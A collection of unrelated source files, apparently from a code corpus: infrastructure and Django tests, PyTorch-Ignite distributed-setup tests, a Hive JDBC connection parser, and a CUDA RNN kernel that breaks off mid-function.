@pytest.mark.parametrize("installed_packages", [
("haproxy20"),
("socat"),
("keepalived"),
("bind"),
])
def test_packages_installed(host, installed_packages):
rpackage = host.package(installed_packages)
assert rpackage.is_installed
@pytest.mark.parametrize("services", [
("haproxy"),
# ("keepalive"),
("named"),
])
def test_services_running_and_enabled(host, services):
service = host.service(services)
assert service.is_enabled
assert service.is_running
@pytest.mark.parametrize("files", [
("/etc/pki/haproxy/star_haproxy.pem"),
])
def test_star_haproxy_pem(host, files):
star_haproxy_pem = host.file(files)
assert star_haproxy_pem.user == "root"
assert star_haproxy_pem.group == "root"
assert star_haproxy_pem.mode == 0o600
assert star_haproxy_pem.contains('-----BEGIN CERTIFICATE-----')
assert star_haproxy_pem.contains('-----BEGIN RSA PRIVATE KEY-----')
def test_sysctl_non_local_bind(host):
non_local_bind = host.sysctl("net.ipv4.ip_nonlocal_bind")
assert non_local_bind == 1
|
16020
|
import sys
from django.core.management import CommandError, call_command
from django.test import TestCase
from .side_effects import bad_database_check
try:
from unittest.mock import patch
except ImportError:
from mock import patch
# Python 2.7 support
if sys.version_info > (3, 0):
from io import StringIO
else:
from io import BytesIO as StringIO
class CommandTestCase(TestCase):
def test_command(self):
out = StringIO()
call_command("healthcheck", stdout=out)
self.assertIn("OK", out.getvalue())
def test_command_failed(self):
with patch(
"django_alive.checks.check_database", side_effect=bad_database_check
):
with self.assertRaises(CommandError):
call_command("healthcheck")
|
16022
|
import os
import pytest
import torch
import torch.distributed as dist
from ignite.distributed.comp_models import has_native_dist_support
if not has_native_dist_support:
pytest.skip("Skip if no native dist support", allow_module_level=True)
else:
from ignite.distributed.comp_models.native import _expand_hostlist, _NativeDistModel, _setup_ddp_vars_from_slurm_env
# tests from https://github.com/LLNL/py-hostlist/blob/master/hostlist/unittest_hostlist.py
@pytest.mark.parametrize(
"hostlist, expected",
[
("localhost", "localhost"),
("compute!:b24_[1-2].r", "compute!:b24_1.r,compute!:b24_2.r"),
("quartz[4-8]", "quartz4,quartz5,quartz6,quartz7,quartz8"),
("c1001a-[11,17]", "c1001a-11,c1001a-17"),
("c1001a-s[11,17]", "c1001a-s11,c1001a-s17"),
("c1009a-s17,c1010a-s11", "c1009a-s17,c1010a-s11"),
(
"gpu-compute-on-demand-dy-g4dnxlarge-[1-4]",
"gpu-compute-on-demand-dy-g4dnxlarge-1,"
"gpu-compute-on-demand-dy-g4dnxlarge-2,"
"gpu-compute-on-demand-dy-g4dnxlarge-3,"
"gpu-compute-on-demand-dy-g4dnxlarge-4",
),
(
"node[18-19,1-16,21-22]",
"node1,node2,node3,node4,node5,"
"node6,node7,node8,node9,node10,"
"node11,node12,node13,node14,node15,"
"node16,node18,node19,node21,node22",
),
(
"node[4-8,12,16-20,22,24-26]",
"node4,node5,node6,node7,node8,"
"node12,node16,node17,node18,"
"node19,node20,node22,node24,"
"node25,node26",
),
("machine2-[02-4]vm1", "machine2-02vm1,machine2-03vm1,machine2-04vm1"),
(
"machine2-[02-3]vm1, machine4-[0003-5].vml2",
"machine2-02vm1,machine2-03vm1,machine4-0003.vml2,machine4-0004.vml2,machine4-0005.vml2",
),
("machine2-[009-11]vm1", "machine2-009vm1,machine2-010vm1,machine2-011vm1"),
("node[1,2,3]", "node1,node2,node3"),
(
"compute-b24-[1-3,5-9], compute-b25-[1,4,8],compute-b25-[2-9,13]",
"compute-b24-1,compute-b24-2,compute-b24-3,compute-b24-5,compute-b24-6,"
"compute-b24-7,compute-b24-8,compute-b24-9,compute-b25-1,compute-b25-4,"
"compute-b25-8,compute-b25-2,compute-b25-3,compute-b25-4,compute-b25-5,"
"compute-b25-6,compute-b25-7,compute-b25-8,compute-b25-9,compute-b25-13",
),
],
)
def test_expand_hostlist(hostlist, expected):
assert _expand_hostlist(hostlist) == expected.split(",")
def test_expand_hostlist_invalid():
with pytest.raises(ValueError, match=r"hostlist invalid"):
_expand_hostlist("invalid[]")
@pytest.mark.distributed
def test__native_dist_model():
available_backends = _NativeDistModel.available_backends
if dist.is_nccl_available():
assert "nccl" in available_backends
else:
assert "nccl" not in available_backends
if dist.is_gloo_available():
assert "gloo" in available_backends
else:
assert "gloo" not in available_backends
if dist.is_mpi_available():
assert "mpi" in available_backends
else:
assert "mpi" not in available_backends
with pytest.raises(ValueError, match=r"Backend should be one of"):
_NativeDistModel.create_from_backend("abc")
@pytest.mark.distributed
@pytest.mark.skipif(not dist.is_nccl_available(), reason="Skip if nccl not available")
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_nccl_but_no_gpu(mock_gpu_is_not_available):
with pytest.raises(RuntimeError, match=r"Nccl backend is required but no cuda capable devices"):
_NativeDistModel(backend="nccl")
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_dist_model_create_from_backend_bad_config():
import os
from datetime import timedelta
os.environ["RANK"] = "1"
with pytest.raises(RuntimeError, match=r"PyTorch distributed configuration should define env variables"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
del os.environ["RANK"]
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_dist_model_create_from_backend_bad_slurm_config():
import os
from datetime import timedelta
os.environ["SLURM_JOB_ID"] = "1"
with pytest.raises(RuntimeError, match=r"SLURM distributed configuration is missing"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
with pytest.raises(ValueError, match=r"Arguments rank and world_size should not be specified with SLURM"):
_NativeDistModel.create_from_backend(
backend="gloo", timeout=timedelta(seconds=10), rank=1, init_method="", world_size=1
)
os.environ["SLURM_PROCID"] = "0"
os.environ["SLURM_LOCALID"] = "0"
os.environ["SLURM_NTASKS"] = "1"
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
os.environ["RANK"] = "1"
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
model = _NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
del os.environ["RANK"]
def _assert_model(model, true_conf):
assert model.device() == torch.device(true_conf["device"])
assert model.get_local_rank() == true_conf["local_rank"]
assert model.get_rank() == true_conf["rank"]
assert model.get_world_size() == true_conf["world_size"]
assert model.get_node_rank() == true_conf["node_index"]
assert model.get_nnodes() == true_conf["nnodes"]
assert model.get_nproc_per_node() == true_conf["nproc_per_node"]
def _test__native_dist_model_create_from_backend_no_dist(backend, true_device):
from datetime import timedelta
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timedelta(seconds=20))
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
_assert_model(
model,
{
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
},
)
model.finalize()
def _test__native_dist_model_create_from_backend_dist(init_method, local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
os.environ["RANK"] = f"{rank}"
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout, init_method=init_method)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
if init_method is None:
assert model._init_method == "env://"
else:
assert model._init_method == init_method
model.finalize()
del os.environ["RANK"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
def _test__native_dist_model_create_from_backend_slurm(local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
del os.environ["WORLD_SIZE"]
del os.environ["LOCAL_RANK"]
os.environ["SLURM_JOB_ID"] = "15000"
os.environ["SLURM_PROCID"] = str(rank)
os.environ["SLURM_LOCALID"] = str(local_rank)
os.environ["SLURM_NTASKS"] = str(world_size)
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
os.environ["WORLD_SIZE"] = str(world_size)
os.environ["LOCAL_RANK"] = str(local_rank)
def _test__native_dist_model_create_from_context_no_local_rank():
if "LOCAL_RANK" in os.environ:
del os.environ["LOCAL_RANK"]
from ignite.distributed.comp_models.base import ComputationModel
if ComputationModel._ext_local_rank is not None:
ComputationModel._ext_local_rank = None
with pytest.warns(UserWarning, match=r"Local rank information for native distributed setting will be initialized"):
_NativeDistModel.create_from_context()
def _test__native_dist_model_create_from_context_env_local_rank(true_conf):
import os
remove_lrank = False
if "LOCAL_RANK" not in os.environ:
os.environ["LOCAL_RANK"] = str(true_conf["local_rank"])
remove_lrank = True
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
if remove_lrank:
del os.environ["LOCAL_RANK"]
def _test__native_dist_model_create_from_context_set_local_rank(true_conf):
from ignite.distributed.comp_models.base import ComputationModel
lrank = None
if "LOCAL_RANK" in os.environ:
lrank = os.environ["LOCAL_RANK"]
del os.environ["LOCAL_RANK"]
ComputationModel._ext_local_rank = true_conf["local_rank"]
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
ComputationModel._ext_local_rank = None
if lrank is not None:
os.environ["LOCAL_RANK"] = lrank
def _test__native_dist_model_create_from_context_no_dist(true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=1, rank=0)
dist.barrier()
_test__native_dist_model_create_from_context_no_local_rank()
true_conf = {
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
def _test__native_dist_model_create_from_context_dist(local_rank, rank, world_size, true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=world_size, rank=rank)
dist.barrier()
if torch.cuda.is_available():
torch.cuda.set_device(local_rank)
true_conf = {
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
def test__native_dist_model_create_no_dist_gloo(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("gloo", device)
_test__native_dist_model_create_from_context_no_dist("gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_no_dist_nccl(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("nccl", device)
_test__native_dist_model_create_from_context_no_dist("nccl", device)
@pytest.mark.distributed
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_gloo_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_gloo_1')}/shared"
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_dist(init_method, local_rank, local_rank, world_size, "gloo", device)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
def test__native_dist_model_create_dist_gloo_2(local_rank, world_size):
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "gloo", device)
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_nccl_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_nccl_1')}/shared"
_test__native_dist_model_create_from_backend_dist(
init_method, local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(
local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_dist_nccl_2(local_rank, world_size):
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}")
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Skip if less than 2 GPUs")
def test__native_dist_model_warning_index_less_localrank(local_rank, world_size):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group("nccl", "tcp://0.0.0.0:2222", world_size=world_size, rank=local_rank)
dist.barrier()
# We deliberately incorrectly set cuda device to 0
torch.cuda.set_device(0)
model = _NativeDistModel.create_from_context()
assert isinstance(model, _NativeDistModel), f"{type(model)} vs _NativeDistModel"
if local_rank == 1:
with pytest.warns(UserWarning, match=r"Current device index is less than current local rank."):
model.device()
dist.destroy_process_group()
def _test_dist_spawn_fn(local_rank, backend, world_size, device):
from ignite.distributed.utils import _model
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
assert isinstance(_model, _NativeDistModel), f"{type(_model)} vs _NativeDistModel"
assert _model.get_local_rank() == local_rank
assert _model.get_world_size() == world_size
assert _model.device().type == torch.device(device).type
def _test__native_dist_model_spawn(backend, num_workers_per_machine, device, init_method=None, **spawn_kwargs):
_NativeDistModel.spawn(
_test_dist_spawn_fn,
args=(backend, num_workers_per_machine, device),
kwargs_dict={},
backend=backend,
nproc_per_node=num_workers_per_machine,
init_method=init_method,
**spawn_kwargs,
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.parametrize("init_method", [None, "env://", "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_gloo(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
nproc = torch.cuda.device_count() if torch.cuda.is_available() else 4
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_spawn("gloo", num_workers_per_machine=nproc, device=device, init_method=init_method)
if device.type == "cpu":
_test__native_dist_model_spawn(
"gloo", num_workers_per_machine=nproc, device=device, start_method="fork", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_nccl(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
num_workers_per_machine = torch.cuda.device_count()
_test__native_dist_model_spawn(
"nccl", num_workers_per_machine=num_workers_per_machine, device="cuda", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_none(world_size):
with pytest.raises(ValueError, match=r"Arguments rank and world_size should be None"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_not_none(world_size, local_rank, get_fixed_dirname):
init_method = f"file://{get_fixed_dirname('native_dist_model_init_method_is_not_none')}/shared"
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size, init_method=init_method)
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", rank=local_rank, init_method=init_method)
@pytest.mark.parametrize(
"environ, expected",
[
# fmt: off
# usual SLURM env
(
{
"SLURM_PROCID": "1", "SLURM_LOCALID": "1", "SLURM_NTASKS": "2", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
},
[1, 1, 2, "c1", 17345]
),
# usual SLURM env mnode
(
{
"SLURM_PROCID": "5", "SLURM_LOCALID": "1", "SLURM_NTASKS": "8", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
},
[5, 1, 8, "c1", 17345]
),
# usual SLURM env 1 node, 1 task + torch.distributed.launch
(
{
"SLURM_PROCID": "0", "SLURM_LOCALID": "0", "SLURM_NTASKS": "1", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "127.0.0.1", "MASTER_PORT": "2233", "RANK": "2", "LOCAL_RANK": "2", "WORLD_SIZE": "8",
},
[2, 2, 8, "127.0.0.1", 2233]
),
# usual SLURM env + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "3", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "3", "WORLD_SIZE": "4",
},
[3, 3, 4, "c1", 12233]
),
# usual SLURM env mnode + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "1", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "1", "WORLD_SIZE": "4"
},
[3, 1, 4, "c1", 12233]
),
# fmt: on
],
)
def test__setup_ddp_vars_from_slurm_env(environ, expected):
ddp_keys = ["RANK", "LOCAL_RANK", "WORLD_SIZE", "MASTER_ADDR", "MASTER_PORT"]
ddp_vars = _setup_ddp_vars_from_slurm_env(environ)
for key, value in zip(ddp_keys, expected):
assert key in ddp_vars
assert ddp_vars[key] == value
def test__setup_ddp_vars_from_slurm_env_bad_configs():
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(RuntimeError, match=r"No hostname detected in SLURM_JOB_NODELIST by ignite"):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "[]",
"SLURM_JOB_ID": "12345",
}
_setup_ddp_vars_from_slurm_env(environ)
|
16034
|
import re
from typing import Dict, Tuple, List, NamedTuple, Optional
from lib.utils.decorators import with_exception_retry
from .helpers.common import (
split_hostport,
get_parsed_variables,
merge_hostport,
random_choice,
)
from .helpers.zookeeper import get_hostname_and_port_from_zk
# TODO: make these configurable?
MAX_URI_FETCH_ATTEMPTS = 10
MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC = 5
class RawHiveConnectionConf(NamedTuple):
# Raw Connection Configuration that's from a string -> dict transformation
hosts: List[Tuple[str, Optional[int]]]
default_db: str
session_variables: Dict[str, str]
conf_list: Dict[str, str]
var_list: Dict[str, str]
class HiveConnectionConf(NamedTuple):
host: str
port: Optional[int]
default_db: str
configuration: Dict[str, str]
def _extract_connection_url(connection_string: str) -> RawHiveConnectionConf:
# Parser for Hive JDBC string
# Loosely based on https://cwiki.apache.org/confluence/display/Hive/HiveServer2+Clients#HiveServer2Clients-JDBC
match = re.search(
r"^(?:jdbc:)?hive2:\/\/([\w.-]+(?:\:\d+)?(?:,[\w.-]+(?:\:\d+)?)*)\/(\w*)((?:;[\w.-]+=[\w.-]+)*)(\?[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?(\#[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?$", # noqa: E501
connection_string,
)
hosts = match.group(1)
default_db = match.group(2) or "default"
session_variables = match.group(3) or ""
conf_list = match.group(4) or ""
var_list = match.group(5) or ""
parsed_hosts = []
for hostport in hosts.split(","):
parsed_hosts.append(split_hostport(hostport))
parsed_session_variables = get_parsed_variables(session_variables[1:])
parsed_conf_list = get_parsed_variables(conf_list[1:])
parsed_var_list = get_parsed_variables(var_list[1:])
return RawHiveConnectionConf(
hosts=parsed_hosts,
default_db=default_db,
session_variables=parsed_session_variables,
conf_list=parsed_conf_list,
var_list=parsed_var_list,
)
@with_exception_retry(
max_retry=MAX_URI_FETCH_ATTEMPTS,
get_retry_delay=lambda retry: min(MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC, retry),
)
def get_hive_host_port_from_zk(
connection_conf: RawHiveConnectionConf,
) -> Tuple[str, int]:
zk_quorum = ",".join(
map(lambda hostport: merge_hostport(hostport), connection_conf.hosts)
)
zk_namespace = connection_conf.session_variables.get("zooKeeperNamespace")
raw_server_uris = get_hostname_and_port_from_zk(zk_quorum, zk_namespace) or []
server_uri_dicts = filter(
lambda d: d is not None,
[_server_uri_to_dict(raw_server_uri) for raw_server_uri in raw_server_uris],
)
server_uris = list(map(lambda d: d["serverUri"], server_uri_dicts))
random_server_uri = random_choice(server_uris)
if not random_server_uri:
raise Exception("Failed to get hostname and port from Zookeeper")
return split_hostport(random_server_uri)
def _server_uri_to_dict(server_uri: str) -> Optional[Dict[str, str]]:
match = re.search(r"serverUri=(.*);version=(.*);sequence=(.*)", server_uri)
if match:
return {
"serverUri": match.group(1),
"version": match.group(2),
"sequence": match.group(3),
}
def get_hive_connection_conf(connection_string: str) -> HiveConnectionConf:
hostname = None
port = None
connection_conf = _extract_connection_url(connection_string)
# We use zookeeper to find host name
if connection_conf.session_variables.get("serviceDiscoveryMode") == "zooKeeper":
hostname, port = get_hive_host_port_from_zk(connection_conf)
else: # We just return a normal host
hostname, port = random_choice(connection_conf.hosts, default=(None, None))
return HiveConnectionConf(
host=hostname,
port=port,
default_db=connection_conf.default_db,
configuration=connection_conf.conf_list,
)
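
# Usage sketch (illustrative; the hostnames are made up). For a plain, non-ZooKeeper
# connection string, the parsed host and port come straight from the URL:
#
#   conf = get_hive_connection_conf(
#       "jdbc:hive2://hive-a.example.com:10000,hive-b.example.com:10000/analytics;ssl=true"
#   )
#   conf.host        -> one of the two hosts (picked by random_choice)
#   conf.port        -> 10000
#   conf.default_db  -> "analytics"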
|
16050
|
RRNN_SEMIRING = """
extern "C" {
__global__ void rrnn_semiring_fwd(
const float * __restrict__ u,
const float * __restrict__ eps,
const float * __restrict__ c1_init,
const float * __restrict__ c2_init,
const int len,
const int batch,
const int dim,
const int k,
float * __restrict__ c1,
float * __restrict__ c2,
int semiring_type) {
assert (k == K);
int ncols = batch*dim;
int col = blockIdx.x * blockDim.x + threadIdx.x;
if (col >= ncols) return;
int ncols_u = ncols*k;
const float *up = u + (col*k);
float *c1p = c1 + col;
float *c2p = c2 + col;
float cur_c1 = *(c1_init + col);
float cur_c2 = *(c2_init + col);
const float eps_val = *(eps + (col%dim));
for (int row = 0; row < len; ++row) {
float u1 = *(up);
float u2 = *(up+1);
float forget1 = *(up+2);
float forget2 = *(up+3);
float prev_c1 = cur_c1;
float op1 = times_forward(semiring_type, cur_c1, forget1);
cur_c1 = plus_forward(semiring_type, op1, u1);
float op2 = times_forward(semiring_type, cur_c2, forget2);
float op3_ = plus_forward(semiring_type, eps_val, prev_c1);
float op3 = times_forward(semiring_type, op3_, u2);
cur_c2 = plus_forward(semiring_type, op2, op3);
*c1p = cur_c1;
*c2p = cur_c2;
up += ncols_u;
c1p += ncols;
c2p += ncols;
}
}
__global__ void rrnn_semiring_bwd(
const float * __restrict__ u,
const float * __restrict__ eps,
const float * __restrict__ c1_init,
const float * __restrict__ c2_init,
const float * __restrict__ c1,
const float * __restrict__ c2,
const float * __restrict__ grad_c1,
const float * __restrict__ grad_c2,
const float * __restrict__ grad_last_c1,
const float * __restrict__ grad_last_c2,
const int len,
const int batch,
const int dim,
const int k,
float * __restrict__ grad_u,
float * __restrict__ grad_eps,
float * __restrict__ grad_c1_init,
float * __restrict__ grad_c2_init,
int semiring_type) {
assert (k == K);
int ncols = batch*dim;
int col = blockIdx.x * blockDim.x + threadIdx.x;
if (col >= ncols) return;
int ncols_u = ncols*k;
float cur_c1 = *(grad_last_c1 + col);
float cur_c2 = *(grad_last_c2 + col);
const float eps_val = *(eps + (col%dim));
const float *up = u + (col*k) + (len-1)*ncols_u;
const float *c1p = c1 + col + (len-1)*ncols;
const float *c2p = c2 + col + (len-1)*ncols;
const float *gc1p = grad_c1 + col + (len-1)*ncols;
const float *gc2p = grad_c2 + col + (len-1)*ncols;
float *gup = grad_u + (col*k) + (len-1)*ncols_u;
float geps = 0.f;
for (int row = len-1; row >= 0; --row) {
float u1 = *(up);
float u2 = *(up+1);
float forget1 = *(up+2);
float forget2 = *(up+3);
const float c1_val = *c1p;
const float c2_val = *c2p;
const float prev_c1 = (row>0) ? (*(c1p-ncols)) : (*(c1_init+col));
const float prev_c2 = (row>0) ? (*(c2p-ncols)) : (*(c2_init+col));
const float gc1 = *(gc1p) + cur_c1;
const float gc2 = *(gc2p) + cur_c2;
cur_c1 = cur_c2 = 0.f;
float op1 = times_forward(semiring_type, prev_c1, forget1);
float gop1 = 0.f, gu1 = 0.f;
plus_backward(semiring_type, op1, u1, gc1, gop1, gu1);
float gprev_c1 = 0.f, gprev_c2 = 0.f, gforget1=0.f;
times_backward(semiring_type, prev_c1, forget1, gop1, gprev_c1, gforget1);
*(gup) = gu1;
*(gup+2) = gforget1;
cur_c1 += gprev_c1;
float op2 = times_forward(semiring_type, prev_c2, forget2);
float op3_ = plus_forward(semiring_type, eps_val, prev_c1);
float op3 = times_forward(semiring_type, op3_, u2);
float gop2 = 0.f, gop3 = 0.f;
plus_backward(semiring_type, op2, op3, gc2, gop2, gop3);
float gop3_ = 0.f, gu2 = 0.f, gforget2 = 0.f, cur_geps=0.f;
times_backward(semiring_type, prev_c2, forget2, gop2, gprev_c2, gforget2);
times_backward(semiring_type, op3_, u2, gop3, gop3_, gu2);
plus_backward(semiring_type, eps_val, prev_c1, gop3_, cur_geps, gprev_c1);
*(gup+1) = gu2;
*(gup+3) = gforget2;
geps += cur_geps;
cur_c1 += gprev_c1;
cur_c2 += gprev_c2;
up -= ncols_u;
c1p -= ncols;
c2p -= ncols;
gup -= ncols_u;
gc1p -= ncols;
gc2p -= ncols;
